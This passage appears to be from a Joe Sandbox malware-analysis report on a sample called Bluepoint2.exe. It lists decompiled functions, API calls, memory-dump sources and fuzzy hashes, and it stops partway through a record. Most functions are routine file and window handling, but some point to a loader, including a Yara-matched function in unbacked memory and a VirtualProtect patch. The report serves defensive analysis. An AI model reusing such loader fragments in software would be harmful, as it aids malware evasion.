                                                                                                                                    0x00401634
                                                                                                                                    0x00401663
                                                                                                                                    0x004022f1
                                                                                                                                    0x00401636
                                                                                                                                    0x00401638
                                                                                                                                    0x00401645
                                                                                                                                    0x0040164d
                                                                                                                                    0x00401655
                                                                                                                                    0x0040165b
                                                                                                                                    0x0040165b
                                                                                                                                    0x00401655
                                                                                                                                    0x00402c2d
                                                                                                                                    0x00402c39

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,77133420,?,77132EE0,00405D94,?,77133420,77132EE0,00000000), ref: 00405FF0
                                                                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                      • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1892508949-0
                                                                                                                                    • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                                                                                                    • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                                                                    • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                                                                                                    • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                                                                                                                                    0x0040138a
                                                                                                                                    0x004013fa
                                                                                                                                    0x0040139b
                                                                                                                                    0x004013a0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004013a2
                                                                                                                                    0x004013a3
                                                                                                                                    0x004013ad
                                                                                                                                    0x00000000
                                                                                                                                    0x00401404
                                                                                                                                    0x004013b0
                                                                                                                                    0x004013b7
                                                                                                                                    0x004013bd
                                                                                                                                    0x004013be
                                                                                                                                    0x004013c0
                                                                                                                                    0x004013c2
                                                                                                                                    0x004013b9
                                                                                                                                    0x004013b9
                                                                                                                                    0x004013ba
                                                                                                                                    0x004013ba
                                                                                                                                    0x004013c9
                                                                                                                                    0x004013cb
                                                                                                                                    0x004013f4
                                                                                                                                    0x004013f4
                                                                                                                                    0x004013c9
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                                                                    • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                                                                    • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                                                                    • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                                    0x00406a3d
                                                                                                                                    0x00406a40
                                                                                                                                    0x00406a47
                                                                                                                                    0x00406a4f
                                                                                                                                    0x00406a5b
                                                                                                                                    0x00000000
                                                                                                                                    0x00406a62
                                                                                                                                    0x00406a52
                                                                                                                                    0x00406a59
                                                                                                                                    0x00000000
                                                                                                                                    0x00406a6a
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                                                      • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                                                      • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                                                                      • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                    • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                                                                    • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                                                                    • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                                                                    • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                    			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                                    0x0040615c
                                                                                                                                    0x00406169
                                                                                                                                    0x0040617e
                                                                                                                                    0x00406184

                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Bluepoint2.exe,80000000,00000003), ref: 0040615C
                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                    • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                                                                    • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                                                                    • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                                                                    • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                                                                    0x00406138
                                                                                                                                    0x0040613e
                                                                                                                                    0x00406143
                                                                                                                                    0x0040614c
                                                                                                                                    0x0040614c
                                                                                                                                    0x00406155

                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040614C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                    • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                                                                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                    • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                                    0x00405c1c
                                                                                                                                    0x00405c24
                                                                                                                                    0x00000000
                                                                                                                                    0x00405c2a
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                                                                    • GetLastError.KERNEL32 ref: 00405C2A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                    • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                                                                    • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                                                                    • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                                                                    • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0336BCFF Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNELBASE(00000000,?,?,0335D65D,-17CD9789,0336A4C7,00000000), ref: 0336BDF7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: 7ad4d4e58732bd453b1bc5dcbd862b5b7e1fa98186057931436c730abd3800f3
                                                                                                                                    • Instruction ID: 6edae4c0fbd4ce896ccb1b50abeba4fe57c821c245c7e2623baa71e350d1126c
                                                                                                                                    • Opcode Fuzzy Hash: 7ad4d4e58732bd453b1bc5dcbd862b5b7e1fa98186057931436c730abd3800f3
                                                                                                                                    • Instruction Fuzzy Hash: 3701C4759102748FDF349E164C907DE77689F59650F41C05ADC58AB208C7704D018BD0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 713C2A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x713c5048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x713c505c, 4, 0x40, 0x713c504c); // executed
					 *0x713c505c = 0xc2;
					 *0x713c504c = 0;
					 *0x713c5054 = 0;
					 *0x713c5068 = 0;
					 *0x713c5058 = 0;
					 *0x713c5050 = 0;
					 *0x713c5060 = 0;
					 *0x713c505e = 0;
				}
				return 1;
			}



                                                                                                                                    0x713c2a88
                                                                                                                                    0x713c2a8d
                                                                                                                                    0x713c2a9d
                                                                                                                                    0x713c2aa5
                                                                                                                                    0x713c2aac
                                                                                                                                    0x713c2ab1
                                                                                                                                    0x713c2ab6
                                                                                                                                    0x713c2abb
                                                                                                                                    0x713c2ac0
                                                                                                                                    0x713c2ac5
                                                                                                                                    0x713c2aca
                                                                                                                                    0x713c2aca
                                                                                                                                    0x713c2ad2

                                                                                                                                    APIs
                                                                                                                                    • VirtualProtect.KERNELBASE(713C505C,00000004,00000040,713C504C), ref: 713C2A9D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84129670690.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84129620684.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129732994.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129781776.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_713c0000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                    • Opcode ID: 9f70518d300cc1982721ff9bc50a22ffe381ecac4b27da0c5e9615fad4826030
                                                                                                                                    • Instruction ID: b548d9e8d765348feb4e5d782e9f82fa1b3cb650f69264818e00d2cdcfd31f32
                                                                                                                                    • Opcode Fuzzy Hash: 9f70518d300cc1982721ff9bc50a22ffe381ecac4b27da0c5e9615fad4826030
                                                                                                                                    • Instruction Fuzzy Hash: 0AF0A5F27492A0DED351EF2A84447293BF8B718705BA4452BE588D62C0E734A444DB99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                                    0x00403606
                                                                                                                                    0x0040360c

                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004045F9 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004045F9(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a268, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                                                                                    0x00404607
                                                                                                                                    0x0040460d

                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                                                                    • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                                                                                                    • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                                                                    • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 713C12BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E713C12BB() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x713c506c +  *0x713c506c); // executed
				return _t3;
			}




                                                                                                                                    0x713c12c5
                                                                                                                                    0x713c12cb

                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,713C12DB,?,713C137F,00000019,713C11CA,-000000A0), ref: 713C12C5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84129670690.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
